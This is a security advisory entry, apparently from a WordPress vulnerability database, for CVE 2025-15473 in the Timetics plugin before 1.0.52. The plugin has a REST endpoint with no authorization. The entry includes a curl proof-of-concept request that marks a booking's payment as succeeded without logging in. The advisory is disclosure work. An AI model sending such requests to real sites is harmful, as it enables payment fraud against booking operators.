Timetics < 1.0.52 – Unauthenticated Payment/Booking Status Update | CVE 2025-15473 | Plugin Vulnerabilities

Description

The plugin does not have authorization in a REST endpoint, allowing unauthenticated users to arbitrarily change a booking's payment status and post status for the "timetics-booking" custom post type.

Proof of Concept

curl -X POST 'https://example.com.com/wp-json/timetics/v1/bookings/27/payment' \
  -H "Content-Type: application/json" \
  -d '{"status":"succeeded","payment_method":"manual","payment_details":{"tx":"confirmed-by-attacker"}}'

Affects Plugins

Fixed in 1.0.52

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Verified

Yes

WPVDB ID

f355e4ac-7aa6-4c5b-b1e5-b37937156583

Timeline

Publicly Published

2026-02-19 (about 21 days ago)

Added

2026-02-19 (about 20 days ago)

Last Updated

2026-02-19 (about 20 days ago)

Other

Published

Title

Published

2024-01-31

Title

Load More Anything < 3.3.4 - Subscriber+ Settings Update

Published

2025-11-29

Title

Quick Interest Slider <= 3.1.5 - Missing Authorization

Published

2025-07-30

Title

Classified Listing < 5.0.1 - Authenticated (Contributor+) Content Injection

Published

2024-06-10

Title

Custom Field Template < 2.6.2 - Authenticated(Contributor+) Information Exposure

Published

2023-12-06

Title

Shortcoder < 6.3.1 - Subscriber+ Unauthorised AJAX Call